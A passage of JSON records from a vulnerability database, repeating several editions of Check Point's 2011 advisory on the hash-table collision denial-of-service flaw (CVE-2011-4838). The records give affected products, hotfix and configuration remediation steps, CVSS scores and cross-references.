"edition": 16}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "cfdde2d0d2a7ecab5dccde9688c57e9c", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-29T22:00:00", "modified": "2011-12-29T22:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-08T07:07:05", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4885", "UB:CVE-2011-4815", "UB:CVE-2011-4838"]}, {"type": "cve", "idList": ["CVE-2011-4885", "CVE-2011-4838", "CVE-2011-4815", "CVE-2011-3414"]}, {"type": "f5", "idList": ["F5:K13588", "SOL13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2012-001", "CPAI-2014-1022", "CPAI-2013-033"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27500", "SECURITYVULNS:DOC:27501"]}, {"type": "seebug", "idList": ["SSV:30001", "SSV:26122", "SSV:26126", "SSV:26121", "SSV:72454"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:870638", "OPENVAS:1361412562310863735", "OPENVAS:1361412562310863954", "OPENVAS:1361412562310120220", "OPENVAS:881167", "OPENVAS:1361412562310120218", "OPENVAS:1361412562310863742", "OPENVAS:863921", "OPENVAS:864015", "OPENVAS:1361412562310870638", "OPENVAS:1361412562310122001", "OPENVAS:1361412562310863921", "OPENVAS:70754", "OPENVAS:1361412562310881226", "OPENVAS:1361412562310831554", "OPENVAS:1361412562310881149", "OPENVAS:1361412562310122002", "OPENVAS:1361412562310863681", "OPENVAS:863681", "OPENVAS:831554", "OPENVAS:71568", "OPENVAS:136141256231071568", "OPENVAS:1361412562310881167", "OPENVAS:136141256231070754"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-209.NASL", "FEDORA_2011-17542.NASL", "SL_20120111_PHP53_AND_PHP_ON_SL5_X.NASL", "FEDORA_2011-17551.NASL", "SOLARIS11_RUBY_20120417.NASL", "FEDORA_2012-0420.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "FEDORA_2012-0504.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "FEDORA_2012-1262.NASL", "ALA_ALAS-2012-35.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "GENTOO_GLSA-201207-06.NASL", "F5_BIGIP_SOL13588.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "FREEBSD_PKG_D39218103C8011E197E800215C6A37BB.NASL", "CENTOS_RHSA-2012-0070.NASL", "REDHAT-RHSA-2012-0070.NASL", "CENTOS_RHSA-2012-0069.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "REDHAT-RHSA-2012-0069.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0093", "CESA-2012:0070", "CESA-2012:0069"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:7F79620D03", "FEDORA:6D8EE20EB6", "FEDORA:3515C213E6", "FEDORA:6097820D6A", "FEDORA:BFF2C21133"]}, {"type": "amazon", "idList": ["ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0069", "ELSA-2012-0070"]}, {"type": "redhat", "idList": ["RHSA-2012:0069", "RHSA-2012:0070"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:6EC99", "DEBIAN:DLA-209-1:3C908"]}, {"type": "exploitdb", "idList": ["EDB-ID:18296", "EDB-ID:18305"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108294", "PACKETSTORM:108287"]}, {"type": "rubygems", "idList": ["RUBY:JRUBY-2011-4838-78116", "RUBY:RUBY-2011-4815-78118"]}], "modified": "2021-11-07T19:14:20", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-07T19:14:20", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-08T07:07:05", "differentElements": ["modified", "published"], "edition": 17}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "fc0b35930d07b486d73f615d467b0b5b", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-30T08:00:00", "modified": "2011-12-30T08:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-08T11:12:42", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4885", "UB:CVE-2011-4815", "UB:CVE-2011-4838"]}, {"type": "cve", "idList": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"]}, {"type": "f5", "idList": ["F5:K13588", "SOL13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2014-1022", "CPAI-2013-033", "CPAI-2012-001"]}, {"type": "seebug", "idList": ["SSV:26126", "SSV:30001", "SSV:26122", "SSV:26121", "SSV:72454"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27501", "SECURITYVULNS:DOC:27500"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:70754", "OPENVAS:863740", "OPENVAS:136141256231071568", "OPENVAS:70735", "OPENVAS:1361412562310863921", "OPENVAS:136141256231070754", "OPENVAS:881149", "OPENVAS:1361412562310870638", "OPENVAS:1361412562310863681", "OPENVAS:1361412562310831554", "OPENVAS:1361412562310122001", "OPENVAS:870539", "OPENVAS:831554", "OPENVAS:1361412562310122002", "OPENVAS:1361412562310120218", "OPENVAS:863963", "OPENVAS:863681", "OPENVAS:1361412562310881167", "OPENVAS:1361412562310120256", "OPENVAS:863824", "OPENVAS:863954", "OPENVAS:870638", "OPENVAS:71568", "OPENVAS:1361412562310863740", "OPENVAS:881226", "OPENVAS:881142", "OPENVAS:881167", "OPENVAS:863921"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-209.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "SL_20120130_RUBY_ON_SL6_X.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "ALA_ALAS-2012-35.NASL", "REDHAT-RHSA-2012-0070.NASL", "SOLARIS11_RUBY_20120417.NASL", "FEDORA_2011-17542.NASL", "FEDORA_2012-1262.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "FEDORA_2012-0504.NASL", "CENTOS_RHSA-2012-0070.NASL", "CENTOS_RHSA-2012-0069.NASL", "FEDORA_2012-0420.NASL", "GENTOO_GLSA-201207-06.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "REDHAT-RHSA-2012-0069.NASL", "FEDORA_2011-17551.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "F5_BIGIP_SOL13588.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0069", "CESA-2012:0070"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:BFF2C21133", "FEDORA:4930D21410", "FEDORA:6D8EE20EB6"]}, {"type": "amazon", "idList": ["ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0069", "ELSA-2012-0070"]}, {"type": "redhat", "idList": ["RHSA-2012:0069", "RHSA-2012:0070", "RHSA-2012:0092"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:6EC99", "DEBIAN:DLA-209-1:3C908"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108287", "PACKETSTORM:108294"]}, {"type": "exploitdb", "idList": ["EDB-ID:18296", "EDB-ID:18305"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "rubygems", "idList": ["RUBY:RUBY-2011-4815-78118", "RUBY:JRUBY-2011-4838-78116"]}], "modified": "2021-11-08T11:12:42", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-08T11:12:42", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-08T11:12:42", "differentElements": ["modified", "published"], "edition": 18}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "cfdde2d0d2a7ecab5dccde9688c57e9c", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-29T22:00:00", "modified": "2011-12-29T22:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-10T11:13:07", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4815", "UB:CVE-2011-4885", "UB:CVE-2011-4838"]}, {"type": "cve", "idList": ["CVE-2011-4885", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-3414"]}, {"type": "f5", "idList": ["SOL13588", "F5:K13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2014-1022", "CPAI-2012-001"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27500", "SECURITYVULNS:DOC:27501"]}, {"type": "seebug", "idList": ["SSV:26121", "SSV:26126", "SSV:26122", "SSV:72454", "SSV:30001"]}, {"type": "freebsd", "idList": ["D3921810-3C80-11E1-97E8-00215C6A37BB", "91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310122012", "OPENVAS:1361412562310122002", "OPENVAS:831554", "OPENVAS:1361412562310881167", "OPENVAS:870638", "OPENVAS:881167", "OPENVAS:136141256231071568", "OPENVAS:1361412562310863921", "OPENVAS:71568", "OPENVAS:863681", "OPENVAS:863921", "OPENVAS:1361412562310120218", "OPENVAS:870529", "OPENVAS:1361412562310120256", "OPENVAS:863742", "OPENVAS:136141256231070754", "OPENVAS:1361412562310863824", "OPENVAS:1361412562310881075", "OPENVAS:863712", "OPENVAS:1361412562310863954", "OPENVAS:1361412562310122001", "OPENVAS:136141256231070735", "OPENVAS:1361412562310831554", "OPENVAS:1361412562310863681", "OPENVAS:1361412562310870638", "OPENVAS:70754", "OPENVAS:863740"]}, {"type": "nessus", "idList": ["CENTOS_RHSA-2012-0069.NASL", "REDHAT-RHSA-2012-0070.NASL", "CENTOS_RHSA-2012-0070.NASL", "FEDORA_2012-0420.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "SOLARIS11_RUBY_20120417.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "FEDORA_2011-17551.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "REDHAT-RHSA-2012-0019.NASL", "FEDORA_2012-1262.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "ORACLELINUX_ELSA-2012-0069.NASL", "GENTOO_GLSA-201207-06.NASL", "FEDORA_2012-0504.NASL", "FEDORA_2011-17542.NASL", "ALA_ALAS-2012-35.NASL", "DEBIAN_DLA-209.NASL", "F5_BIGIP_SOL13588.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "REDHAT-RHSA-2012-0069.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0070", "CESA-2012:0069"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:BFF2C21133", "FEDORA:6D8EE20EB6", "FEDORA:76D5120DE0"]}, {"type": "amazon", "idList": ["ALAS-2012-041", "ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0070", "ELSA-2012-0069"]}, {"type": "redhat", "idList": ["RHSA-2012:0070", "RHSA-2012:0069"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:3C908", "DEBIAN:DLA-209-1:6EC99"]}, {"type": "exploitdb", "idList": ["EDB-ID:18305", "EDB-ID:18296"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108294", "PACKETSTORM:108287"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "rubygems", "idList": ["RUBY:RUBY-2011-4815-78118", "RUBY:JRUBY-2011-4838-78116"]}], "modified": "2021-11-10T11:13:07", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-10T11:13:07", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-10T11:13:07", "differentElements": ["modified", "published"], "edition": 19}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "fc0b35930d07b486d73f615d467b0b5b", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-30T08:00:00", "modified": "2011-12-30T08:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-11T03:12:21", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4885", 